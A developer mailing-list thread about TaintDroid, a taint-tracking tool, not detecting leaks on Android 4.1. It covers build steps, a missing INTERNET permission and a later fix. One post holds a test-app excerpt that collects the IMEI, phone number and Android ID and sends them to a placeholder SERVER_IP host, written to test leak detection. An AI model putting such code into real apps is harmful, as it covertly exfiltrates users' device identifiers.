TaintDroid for Android4.1 not working

[Ryo Yamada]

I've built TaintDroid for Android4.1 following the instruction at http://appanalysis.org/download.html.

But when I start the emulator and run a test application that simply sends IMEI by HTTP-POST to a specific server when the button is clicked, 
nothing appears in logcat.

Here's what  I did.

1. $ cd ~/tdroid/tdroid-4.1.1_r6

2. $ emulator -system ./out/target/product/generic/system.img -ramdisk ./out/target/product/generic/ramdisk.img&

3. start TaintDroidNotify, then push "Start" button

4. start logcat

5. start my test application

I thought the command to start emulator is wrong, and tried something like following, but the results are the same.

- $ emulator 

- $ emulator -avd my_avd_4.1 -system ./out/target/product/generic/system.img -ramdisk ./out/target/product/generic/ramdisk.img

Can someone help me?

[Peter]

Would you mind sharing the source code for your test app?

Thanks,
Peter

[Ryo Yamada]

Sure, here is main part that sends IMEI etc. I ran tcpdump simultaneously on my machine and confirmed that the information is leaking.

======================================================================================

    TelephonyManager telephonyManager = (TelephonyManager)getSystemService(TELEPHONY_SERVICE);

    AsyncHttpClient ah = new AsyncHttpClient();   //(Using a library named asynchttpclient to post data)

    RequestParams params = new RequestParams();

    String imei = telephonyManager.getDeviceId();                                                                                                                                 

    String androidId = android.provider.Settings.Secure.ANDROID_ID; 

    String phone = telephonyManager.getLine1Number();

    params.put("imei", imei);

    params.put("phone", phone);

    params.put("androidId", androidId);

    ah.post("http://SERVER_IP:80", params, new AsyncHttpResponseHandler(){

    @Override

    public void onSuccess(String arg0) {

         super.onSuccess(arg0);

    }

======================================================================================

2012年10月26日金曜日 21時56分20秒 UTC+9 Peter:

[gsbabil]

Hi Peter,

I could confirm the same for 4.1 on Nexus S.

[Peter]

Would either of you be willing to put together a runnable code sample, or a set of detailed instructions on how to reproduce? It appears from the posted code excerpt that tracking is lost somewhere inside the library you are using for http post.

Thanks,
Peter

[Seth Robertson]

I had the same problem when using emulator and the most recent 4.1.1_r6 code.  The lack of test applications or any diagnostics to let me know it is working led me to find https://sites.google.com/site/taintdroid23/files/TaintDroidTester.apk and none of the methods available to me triggered anything.  I have no idea whether I am missing some kind of initialization or something (I tried setting "-prop dalvik.vm.execution-mode=int:portable" on the emulator command line to no avail) but I was able to prove that the binaries in the running system had taintdroid code in them.

[Peter]

Hi guys,

Thanks for reporting this issue. I am able to reproduce the problem using the library from http://loopj.com/android-async-http/. We are working on diagnosing it. Thanks again for your help!

Peter

On Friday, October 26, 2012 1:20:55 AM UTC-4, Ryo Yamada wrote:

[Peter]

My test app using the android-async-http library to send an http post containing the IMEI is now behaving as expected on the emulator with TaintDroid 4.1, i.e., TaintDroid prints an alert to the log and generates a notification if TaintDroidNotify is running. My code is essentially identical to the code Ryo posted. The issue with my test app was that I neglected to request the permission android.permission.INTERNET in the manifest, and the call to AsyncHttpClient.post was failing silently. Please verify the following:

1. your test app requests the necessary permission android.permission.INTERNET
2. you are working with the latest version of the TaintDroid code. From the root TaintDroid source directory:

repo sync
repo forall dalvik libcore frameworks/base frameworks/native system/vold device/samsung/crespo device/samsung/tuna \
       packages/apps/TaintDroidNotify -c 'git checkout -b taintdroid-4.1.1_r6 --track github/taintdroid-4.1.1_r6 && git pull'

Peter

[gsbabil]

Hi Peter,

 - could you please point out which part of the code fixed the issue?

 - the emulator seems to work, builds for real phones still seem to show the previous problem.

[Peter]

I just checked in an update to taintdroid-4.1.1_r6 on github that should fix this problem on actual devices. Please let me know if it works for you. Thanks for helping out!

Peter

[ldelo...@hispasec.com]

Dear Peter,

I have checked if TaintDroid 4.1.1_rc6  was detecting any information leakage through INTERNET by sending the IMEI through the interface HttpURLConnection. Unfortunately I do not get any warning in my logs. Nevertheless, it works fine if I try to send out the IMEI via SMS. Could you confirm me this problem?

Laurent